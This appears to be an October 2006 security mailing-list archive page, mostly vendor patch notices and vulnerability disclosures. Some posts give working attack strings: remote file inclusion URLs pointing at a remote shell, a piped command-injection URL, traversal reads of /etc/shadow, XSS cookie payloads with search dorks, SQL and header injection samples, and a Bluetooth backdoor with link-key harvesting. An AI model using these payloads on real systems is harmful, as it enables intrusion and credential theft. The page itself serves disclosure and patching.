hack.lu Bluetooth demo

2006-10-23 Thread K F (lists)
As requested by several of the folks that went to hack.lu - 2006 I have 
posted the code for the 'GenerationTwo' InqTana variant at

http://www.digitalmunition.com/hacklu.html

For those that missed it Thierry Zoller of nruns demonstrated a remote 
exploitation of CVE-2005-1333 as a means to compromise both a Bluetooth 
enabled 10.3.9 Macintosh (that has not been patched to 
APPLE-SA-2005-03-21 and APPLE-SA-2005-05-03) and anything that it was 
paired with. The variant also works on 10.4 machines that have not been 
patched with the Mac OS X 10.4.1 and Mac OS X 10.4.7 Updates.


Post-compromise the 'GenerationTwo' variant installs a malicious 
/etc/ttys file with a login getty listening on a Bluetooth rfcomm 
channel. A user is added and a setuid backdoor is left behind for easy 
root access over a Bluetooth rfcomm connection. The final steps of 
exploitation invole the harvesting of any available link keys (via 
KeyHarvest.pl) from blued.plist so that other devices may also be 
exploited.


Much thanks to both Thierry Zoller and the organizers of Hack.lu.

If you have any questions about GenerationTwo feel free to ask. Please 
keep in mind that CVE-2005-1333 was patched almost one and a half years 
ago at this point so I would say that you SHOULD be patched to this by 
now. If you are pen-testing older Macs make sure you check for Bluetooth!

-KF





[USN-368-1] Qt vulnerability

2006-10-23 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-368-1   October 23, 2006
qt-x11-free vulnerability
CVE-2006-4811
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10
Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.04:
  libqt3c102   3:3.3.3-7ubuntu3.1
  libqt3c102-mt3:3.3.3-7ubuntu3.1

Ubuntu 5.10:
  libqt3-mt3:3.3.4-8ubuntu5.1

Ubuntu 6.06 LTS:
  libqt3-mt3:3.3.6-1ubuntu6.1

After a standard system upgrade you need to restart your Desktop
session to effect the necessary changes.

Details follow:

An integer overflow was discovered in Qt's image loader. By processing
a specially crafted image with an application that uses this library
(like Konqueror), a remote attacker could exploit this to execute
arbitrary code with the application's privileges.


Updated packages for Ubuntu 5.04:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.3-7ubuntu3.1.diff.gz
  Size/MD5:62291 8b599a01d2de39b073be2a0bdb8c6475

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.3-7ubuntu3.1.dsc
  Size/MD5: 1816 1fdc71e7378ad7c52f29fde182246d2f

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.3.orig.tar.gz
  Size/MD5: 17358091 b0b98c938851d42a90632b990dca28c0

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-i18n_3.3.3-7ubuntu3.1_all.deb
  Size/MD5:78412 3ea93ae55002054c58a4dc90f51329be

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt3-doc_3.3.3-7ubuntu3.1_all.deb
  Size/MD5:  5421764 68991f2833c99bd70c3c6a190ff0a6d9

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-examples_3.3.3-7ubuntu3.1_all.deb
  Size/MD5:  1552090 6e9316cd2766bcfbaeabc55b3445ad56

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:33004 eefa43c5e3b24370a383a51b36727368

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-dev_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:3 90e34db6cd69cde1e965e13cb55d5810

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-headers_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:   348742 a952c8e7e1a2988b2621fb723404d47a

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:44636 d3c926f39dcb2b932326bab7106859a8

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3c102-mt-mysql_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:45944 f3ed38fff143739feb15fc57c549b35a

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-mt-odbc_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:63988 54ff31515fe216ef4d157b4213584a12

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3c102-mt-psql_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:52248 84314a527126a99fb5d4485ca17aeb63

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-mt-sqlite_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:   216308 41ae0886649734a7bbf05c9b40b6da44

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3c102-mt_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:  3110106 3b3d79bfb5e2a9fb6a05771cfeb13078

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-mysql_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:46056 75efaa38e659b6f640ba1d937124792d

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-odbc_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:64116 1a2c666f5ee47c8b3d485a07b2ed4e26

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-psql_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:52382 0633242d929de9b60a1620e5489f40d2

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3c102-sqlite_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:   216424 44cd04f2b0d0d6d07c1fa69c3177c2f6

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3c102_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:  2996422 36942b9d4853b966ea2746ebaa091ab0

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt3-apps-dev_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:  2114746 2d8a767cfcd05c4de97e06f962b48890

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-assistant_3.3.3-7ubuntu3.1_amd64.deb
  Size/MD5:   246458 133a70053ae29a1647565396adbaf415

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-de

Various Cross-Site-Scripting Vulnerabilities in Oracle Reports

2006-10-23 Thread ak
NameVarious Cross-Site-Scripting Vulnerabilities in Oracle Reports [REP01], 
[REP02]
SeverityLow Risk
CategoryCross Site Scripting (CSS/XSS)
Vendor URL  http://www.oracle.com/
Author  Alexander Kornbrust (ak at red-database-security.com)
Date  18 July 2006 (V 1.0)
Advisory
http://www.red-database-security.com/advisory/oracle_reports_css.html

Details
###
The Oracle Reports parameters showenv [REP01], parsequery [REP01], cellwrapper 
[REP02] and delimiter [REP02] are vulnerable against Cross-Site-Scripting.


Affected Products
#
Internet Application Server
Oracle Application Server
Oracle Developer Suite


Patch Information
#
Apply Oracle Critical Patch Update October 2006 (CPU July 2006).



History
###
28-aug-2003 Oracle secalert was informed
29-aug-2003 Bug confirmed
17-oct-2006 Oracle published CPU October 2006
18-oct-2006 Red-Database-Security published this advisory


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html


[ GLSA 200610-09 ] libmusicbrainz: Multiple buffer overflows

2006-10-23 Thread Matthias Geerdsen

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200610-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: libmusicbrainz: Multiple buffer overflows
  Date: October 22, 2006
  Bugs: #144089
ID: 200610-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple buffer overflows have been found in libmusicbrainz, which
could lead to a Denial of Service or possibly the execution of
arbitrary code.

Background
==

libmusicbrainz is a client library used to access MusicBrainz music
meta data.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  media-libs/musicbrainz   < 2.1.4 >= 2.1.4

Description
===

Luigi Auriemma reported a possible buffer overflow in the
MBHttp::Download function of lib/http.cpp as well as several possible
buffer overflows in lib/rdfparse.c.

Impact
==

A remote attacker could be able to execute arbitrary code or cause
Denial of Service by making use of an overly long "Location" header in
an HTTP redirect message from a malicious server or a long URL in
malicious RDF feeds.

Workaround
==

There is no known workaround at this time.

Resolution
==

All libmusicbrainz users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/musicbrainz-2.1.4"

References
==

  [ 1 ] CVE-2006-4197
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4197

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200610-09.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



signature.asc
Description: OpenPGP digital signature


http://www.red-database-security.com/advisory/oracle_apex_css_notification_msg.html

2006-10-23 Thread ak
Cross-Site-Scripting Vulnerabilitiy in Oracle APEX NOTIFICATION_MSG

Name  Cross-Site-Scripting Vulnerabilitiy in Oracle APEX 
NOTIFICATION_MSG
Systems AffectedOracle APEX/HTMLDB
SeverityMedium Risk
CategoryCross Site Scripting (XSS/CSS)
Vendor URL  http://www.oracle.com/
Author  Alexander Kornbrust (ak at red-database-security.com)
Date  18 October 2006 (V 1.00)
Advisory
http://www.red-database-security.com/advisory/oracle_apex_css_notification_msg.html

Details
###
The parameter NOTIFCATION_MSG parameter contains a cross site scripting 
vulnerability.

Affected Products
#
Oracle APEX/HTMLDB < 2.2.1


Patch Information
#
This bug is fixed with the patch 2.2.1 of APEX which is not part of the 
Critical Patch Update October 2006. It's necessary to upgrade your APEX/HTMLDB 
installation to 2.2.1. Patches are currently not available for Oracle 
Application Express.



History
###
03-oct-2005 Oracle secalert was informed
04-oct-2005 Bug confirmed
17-oct-2006 Oracle published CPU October 2006
18-oct-2006 Red-Database-Security published this advisory



Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html


RMSOFT Cross Site Scripting

2006-10-23 Thread FREAK_PR
Cross Site Scripting
In

RMSOFT  [Catalogo de Imagenes]

URL: modules/rmgs/images.php?kw=alert(document.cookie)&q=search

Google Dork: 
allinurl: /modules/rmgs/

Potenciado for XOOPS All Versions
Greetz: _ANtrAX_,HANOWARS,4UREV01R & WWW.C-GROUP.ORG


trawler <= 1.8.1 Remote File Inclusion

2006-10-23 Thread k1tk4t
#
# trawler <= 1.8.1  Remote File Inclusion
# Download Source : http://harald-kampen.de/trawler1.8.1.zip
#
# Found By: k1tk4t - k1tk4t[4t]newhack.org
# Location: Indonesia   --  #newhack[dot]org @irc.dal.net

exploit;
http://localhost/_msdazu_pdata/redaktion/artikel/up/index.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/addtort.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/colorpik2.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/colorpik3.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/extras_menu.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/farbpalette.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/lese_inc.php?path_red2=http://shell
http://localhost/_msdazu_share/richtext/newfile.php?path_red2=http://shell
http://localhost/_msdazu_share/share/insert1.php?path_scr_dat2=http://shell
http://localhost/_msdazu_share/extras/downloads/index.php?path_red=http://shell
and many more bug in this packet trawler ver 1.8.1 <-- :( this packet is openbug

Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159 
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#nyubicrew [all member solpotcrew community]
#asiahacker [all member asiahacker community]


Symantec Product Security: Symantec Device Driver Elevation of Privileg

2006-10-23 Thread secure
Symantec Product Security Advisory

October 23, 2006

SYM06-022 Symantec Device Driver Elevation of Privilege

Risk Impact:  Medium 
Remote Access: No
Local Access: Yes
Authentication Required: Yes
Exploit available: No

Overview 
Symantec was notified of a vulnerability in a device driver which, if 
successfully exploited, could allow a local attacker to execute arbitrary code 
with elevated privileges or to crash the system. 

Affected Products 

Symantec AntiVirus Corporate Edition 8.1
Symantec AntiVirus Corporate Edition 9.0.3 and earlier 
Symantec Client  Security  1.1
Symantec Client Security  2.0.3 and earlier 

Unaffected Products

Symantec AntiVirus Corporate Edition 8.1.1 MR9
Symantec AntiVirus Corporate Edition 9.0.4 and later
Symantec AntiVirus Corporate Edition 10.x
Symantec Client Security  3.x
Norton AntiVirus 2005 and later 
Norton Internet Security 2005 and later 
Norton System Works  2005 and later 

Details

Boon Seng Lim notified Symantec of a vulnerability in SAVRT.SYS which could 
allow a malicious user to use the output buffer of DeviceIOControl()to 
overwrite kernel addresses because the address space of the output buffer was 
not properly validated.  A successful exploit could potentially allow a local 
attacker to execute code of their choice with elevated privileges, or to crash 
the system.  


Symantec Response

Symantec engineers verified that this issue exists in the affted products list 
above, and have released updates for currently supported affected products. 

Symantec is not aware of any customers impacted by this issue, or of any 
attempts to exploit the issue.  

Any future updates to this adivsory will be posted in the Symantec Advisory:
http://www.symantec.com/avcenter/security/Content/2006.10.23.html


Credit
Symantec would like to thank Boon Seng Lim for reporting this issue, and 
working with us on the resolution.  


CVE
This issue is a candidate for inclusion in the Common Vulnerabilities and 
Exposures (CVE) list (http://cve.mitre.org), which standardizes names for 
security problems.   The CVE initiative has assigned CVE-2006-3455 to this issue


[SECURITY] [DSA 1198-1] New python2.3 packages fix arbitrary code execution

2006-10-23 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1198-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
October 23rd, 2006  http://www.debian.org/security/faq
- --

Package: python2.3
Vulnerability  : buffer overflow
Problem-Type   : local(remote)
Debian-specific: no
CVE ID : CVE-2006-4980
Debian Bug : 391589

Benjamin C. Wiley Sittler discovered that the repr() of the Python 
interpreter allocates insufficient memory when parsing UCS-4 Unicode
strings, which might lead to execution of arbitrary code through
a buffer overflow.

For the stable distribution (sarge) this problem has been fixed in
version 2.3.5-3sarge2. Due to build problems this update lacks fixed
packages for the Alpha and Sparc architectures. Once they are sorted
out, fixed binaries will be released.

For the unstable distribution (sid) this problem has been fixed in
version 2.3.5-16.

We recommend that you upgrade your Python 2.3 packages.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2.dsc
  Size/MD5 checksum: 1146 c38d235942cfb8afc2a134095983fcc3

http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2.diff.gz
  Size/MD5 checksum:  2352797 40d9ed18456b48d968a245de572090f6

http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5.orig.tar.gz
  Size/MD5 checksum:  8512566 9c35e5ca3c487e1c1f70f2fb1ccbfffe

  Architecture independent components:


http://security.debian.org/pool/updates/main/p/python2.3/idle-python2.3_2.3.5-3sarge2_all.deb
  Size/MD5 checksum:   235662 ad56ea2b6e7020e58cca9d3a8119ad94

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-doc_2.3.5-3sarge2_all.deb
  Size/MD5 checksum:  2860658 beb68a0918006c0b8435429bdf679af6

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-examples_2.3.5-3sarge2_all.deb
  Size/MD5 checksum:   513034 38a28c4550fc4a8690e4d9a70f2c9029

  AMD64 architecture:


http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2_amd64.deb
  Size/MD5 checksum:  3036816 7b448a5a3461e36baabefc85293ef617

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge2_amd64.deb
  Size/MD5 checksum:  1593430 36c9298f302d09612c2739723d2c2631

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge2_amd64.deb
  Size/MD5 checksum:27150 cc6f50422763cb7e5181f44a9f9f454f

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-mpz_2.3.5-3sarge2_amd64.deb
  Size/MD5 checksum:31950 06361f2059f7086e0d31641720ce689f

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-tk_2.3.5-3sarge2_amd64.deb
  Size/MD5 checksum:   109784 273a79d36da2b54ccc79aeb84ff4c5a2

  ARM architecture:


http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2_arm.deb
  Size/MD5 checksum:  2879682 5599d0414d3b126c4bfa9e6f767f6b68

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge2_arm.deb
  Size/MD5 checksum:  1647266 8ea66e2fef0442ae83b6ed65553494ad

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge2_arm.deb
  Size/MD5 checksum:26630 36ba9ad6e492d47a65052d645ba01aaa

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-mpz_2.3.5-3sarge2_arm.deb
  Size/MD5 checksum:30356 3037b21cb0196e315d5a97ca211f9f87

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-tk_2.3.5-3sarge2_arm.deb
  Size/MD5 checksum:   107538 86fa9c7568a36645d532812da7dcb419

  HP Precision architecture:


http://security.debian.org/pool/updates/main/p/python2.3/python2.3_2.3.5-3sarge2_hppa.deb
  Size/MD5 checksum:  3330806 447ead4cd77babc3f8284b9092e211b3

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-dev_2.3.5-3sarge2_hppa.deb
  Size/MD5 checksum:  1829560 0714c0d2161c2e91e6a351efb67d10dc

http://security.debian.org/pool/updates/main/p/python2.3/python2.3-gdbm_2.3.5-3sarge2_hppa.deb
  Size/MD5 checksum:28092 1450042d3e4a8eca1625bacb98c7de17

ht

WikiNi Multiple Cross Site Scripting Vulnerabilities

2006-10-23 Thread raphael . huck
Hi, I've found 2 XSS vulns in WikiNi. The programmers have been contacted and 
the vulns addressed in version 0.4.4.

The name parameter of page wakka.php is not properly sanitized:




http://www.example.com/wakka.php";>











The email parameter of page wakka.php is not properly sanitized:




http://www.example.com/wakka.php";>











Original advisory: http://zone14.free.fr/advisories/6/

--Raphael HUCK


Application orders Linux in WebAPP v0.9.9.2.1

2006-10-23 Thread the_free_kernel
By b0rizQ

Dork : inurl:"apage/apage.cgi OR  powered by WebAPP v0.9.9.2.1

File : apage.cgi 

Exploits : 

http://www.exemple.com/cgi-bin/mods/apage/apage.cgi?f=training.htm.|pwd|


Multiple HTTP response splitting vulnerabilities in SHOP-SCRIPT

2006-10-23 Thread Debasis Mohanty

Vendor:  Shop-Script (a division of WebAsyst LLC)
Application: Shop-Script (www.shop-script.com)

I. Descriptions:

Shop-Script is a PHP based shopping cart. Multiple links of
shop-script are vulnerable to a new form of application attack

technique called HTTP Response splitting (aka CRLF Injection). HTTP
Response Splitting enables an attacker to alter the HTTP

response header structure which can leads to various range of attacks
such as web cache poisoning, temporary defacement,

hijacking pages or cross-site scripting (XSS). This happens since the
user input is injected into the value section of http

header without properly escaping/removing CRLF characters which can
leads to two HTTP responses instead of one response.



II. Affected Links:

POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0
POST /premium/index.php?news=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST 
/premium/index.php?search_with_change_category_ability=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0
POST /premium/index.php?logging=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?feedback=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?show_price=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST /premium/index.php?register=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST 
/premium/index.php?answer=%0d%0aFakeHeader:Fake_Custom_Header&save_voting_results=yes
HTTP/1.0
POST /premium/index.php?productID=%0d%0aFakeHeader:Fake_Custom_Header HTTP/1.0
POST 
/premium/index.php?searchstring=&inside=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0



III. Proof-of-concept:

[Request Header]

POST /premium/index.php?links_exchange=%0d%0aFakeHeader:Fake_Custom_Header
HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET
CLR 1.1.4322)
Host: www.shop-script-demo.com
Content-Length: 18
Cookie: PHPSESSID=e0d1c748db4ce6fa7886403e65458aaa
Connection: Close
Pragma: no-cache

current_currency=1


[Response Header]

HTTP/1.1 302 Found
Date: Mon, 16 Oct 2006 17:39:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: index.php?links_exchange=
FakeHeader:Fake_Custom_Header   <= [Custome remsponse injected 
by the attacker]
Content-Length: 0
Connection: close
Content-Type: text/html



IV. Remediation:
Sanitize CR(0x13) and LF(0x10) from the user input or properly encode
the output in order to prevent the injection of custom

HTTP headers.



V. Reference:
http://www.securiteam.com/securityreviews/5WP0E2KFGK.html



VI. Credits:
Debasis Mohanty (aka Tr0y)
www.hackingspirits.com


For more vulnerabilities visit -
http://hackingspirits.com/vuln-rnd/vuln-rnd.html


Re: [Full-disclosure] hack.lu Bluetooth demo

2006-10-23 Thread Thierry Zoller
Dear List,

Thanks Kevin for all your time and commitment :)

Slides of the talk (Hack.lu) : http://secdev.zoller.lu/research/hack_lu_2006.pdf
Bluetooth_Cracker : http://secdev.zoller.lu/research/bluetoothcracker.htm

-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7



SQL Injection in Oracle package MDSYS.SDO_LRS

2006-10-23 Thread ak
Name  SQL Injection in package MDSYS.SDO_LRS (7569081) [DB13]
Systems AffectedOracle 9i Rel. 2
SeverityHigh Risk
CategorySQL Injection
Vendor URL  http://www.oracle.com/
Author  Alexander Kornbrust (ak at red-database-security.com)
Advisory18 October 2006 (V 1.00)
Advisory
http://www.red-database-security.com/advisory/oracle_sql_injection_sdo_lrs.html

Details
###
The package MDSYS.SDO_LRS contains a SQL injection vulnerability in the first 
parameter of convert_to_lrs_layer. Oracle forgot to fix this problem with the 
April CPU. Oracle fixed these vulnerabilities with the package DBMS_ASSERT. To 
exploit this vulnerability it is necessary to have the privilege to create a 
PL/SQL-function.


Sample
##
After running the following SQL statement
   select sdo_lrs.convert_to_lrs_layer('"'' or 5=5--''"','RDS','A',1,1,1,1) 
from dual;

The following SQL statement will be executed by Oracle:
 
  SELECT COUNT(*) FROM USER_SDO_INDEX_INFO WHERE TABLE_NAME = '"' OR 5=5--'"' 
AND COLUMN_NAME = 'RDS'


Patch Information
#
Apply the patches for Oracle CPU October 2006.


History
###
19-apr-2006 Oracle secalert was informed
18-oct-2006 Oracle published CPU October 2006 [DB13]
18-oct-2006 Advisory published


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html


SQL Injection in package SYS.DBMS_CDC_IMPDP

2006-10-23 Thread ak
NameSQL Injection in package SYS.DBMS_CDC_IMPDP [DB04]
Systems AffectedOracle 10g
SeverityHigh Risk
CategorySQL Injection
Vendor URL  http://www.oracle.com/
Author  Alexander Kornbrust (ak at red-database-security.com)
Advisory18 October 2006 (V 1.00)
Advisory
http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_cdc_impdp2.html


Details
###
The package SYS.DBMS_CDC_IMPDP contains SQL injection vulnerabilities. Oracle 
fixed this by using dbms_assert.


Patch Information
#
Apply the patches for Oracle CPU October 2006.


History
###
1-nov-2005 Oracle secalert was informed .
18-oct-2006 Oracle published CPU October 2006 [DB04]
18-oct-2006 Advisory published


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html


INCA IM-204 Dsl several vulnerabilities

2006-10-23 Thread crackers_child


INCA IM-204 Dsl  several vulnerabilities


Found By Crackers_Child

[EMAIL PROTECTED]

==


Directory transversal

http://192.168.1.1/cgi-bin/webcm?getpage=/./././././././etc/passwd


http://192.168.1.1/cgi-bin/webcm?getpage=/./././././././etc/shadow


http://192.168.1.1/cgi-bin/webcm?getpage=/./././././././etc/config.xml



Greetz

X_Alperen_X and All SiberSavascilar.Com !







SQL Injection in package XDB.DBMS_XDBZ0

2006-10-23 Thread ak
Name  SQL Injection in package XDB.DBMS_XDBZ0 [DB01]/[DB15]
Systems AffectedOracle 9i Rel.2 - 10g Rel. 2
SeverityHigh Risk
CategorySQL Injection
Vendor URL  http://www.oracle.com/
Author  Alexander Kornbrust (ak at red-database-security.com)
Advisory18 October 2006 (V 1.00)
Advisory
http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_xdbz0.html

Details
###
The package XDB.DBMS_XDBZ0 contains SQL injection vulnerabilities in the 
procedure enable_hierarchy_internal [DB01], disable_hierarchiy_internal [DB15]. 
Oracle fixed this problem by using bind variables and verifying table names.


Patch Information
#
Apply the patches for Oracle CPU October 2006.


History
###
1-nov-2005 Oracle secalert was informed about both bugs.
18-oct-2006 Oracle published CPU October 2006 [DB01], [DB15]
18-oct-2006 Advisory published


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html


Cross-Site-Scripting Vulnerability in Oracle APEX WWV_FLOW_ITEM_HELP

2006-10-23 Thread ak
Name  Cross-Site-Scripting Vulnerability in Oracle APEX 
WWV_FLOW_ITEM_HELP
Systems AffectedOracle APEX/HTMLDB
SeverityMedium Risk
CategoryCross Site Scripting (XSS/CSS)
Vendor URL  http://www.oracle.com/
Author  Alexander Kornbrust (ak at red-database-security.com)
Date  18 October 2006 (V 1.00)
Advisory
http://www.red-database-security.com/advisory/oracle_apex_css_wwv_flow_item_help.html

Details
###
The package WWV_FLOW_ITEM_HELP contains a cross site scripting vulnerability.

Affected Products
#
Oracle APEX/HTMLDB < 2.2.1

Patch Information
#
This bug is fixed with the patch 2.2.1 of APEX which is not part of the 
Critical Patch Update October 2006. It's necessary to upgrade your APEX/HTMLDB 
installation to 2.2.1. Patches are currently not available for Oracle 
Application Express.



History
###
03-oct-2005 Oracle secalert was informed
04-oct-2005 Bug confirmed
17-oct-2006 Oracle published CPU October 2006
18-oct-2006 Red-Database-Security published this advisory


Additional Information
##
An analysis of the Oracle CPU Oct 2006 is available here 
http://www.red-database-security.com/advisory/oracle_cpu_oct_2006.html


SQL Injection Vulnerability in Oracle WWV_FLOW_UTILITIES

2006-10-23 Thread ak
###

NameSQL Injection Vulnerability in Oracle WWV_FLOW_UTILITIES
Systems Affected Oracle APEX/HTMLDB
SeverityHigh Risk
CategorySQL Injection
Vendor URL  http://www.oracle.com/
Author  Alexander Kornbrust (ak at red-database-security.com)
Date  18 October 2006 (V 1.00)
Advisory 
http://www.red-database-security.com/advisory/oracle_apex_sql_injection_wwv_flow_utilities.html

Details
###
The list of values (LOV) in wwv_flow_utilities.gen_popup_list contains a SQL 
injection vulnerability. Depending of the APEX application it is possible 
to inject custom SQL statements. The entire SQL statement is accessible from 
the URL in the parameter P_LOV. To protect the SELECT statement in the URL 
Oracle is using a MD5 checksum. By modifying the SQL statement and 
recalculating 
the MD5 checksum P_LOV_CHECKSUM it is possible to run custom SQL statements 
from the URL.

Sample URL:
http://apex:/pls/htmldb/wwv_flow_utilities.gen_popup_list?p_filter=&p_name=p_t02&p_element_index=1&p_hidden_elem_name=p_t01&p_form_index=0&p_max_elements=&p_escape_html=&p_ok_to_query=YES&p_flow_id=100&p_page_id=11&p_session_id=15108399238201864297&p_eval_value=&p_return_key=YES&p_translation=N&p_lov=select%20cust_last_name%20||%20'%2C%20'%20||%20cust_first_name%20d%2C%20customer_id%20r%20from%20demo_customers%20order%20by%20cust_last_name&p_lov_checksum=82C7EFB6FA3A2FA2C6E1A70FB63BB064



Affected Products
#
This bug is fixed with 2.2 of APEX which is not part of the Critical Patch 
Update October 2006. It's necessary to upgrade your APEX/HTMLDB installation 
to 2.2 or better 2.2.1.

Patches are currently not available for Oracle Application Express.

Patch Information
#
This bug is fixed with Apex 2.2 or higher.



History
###
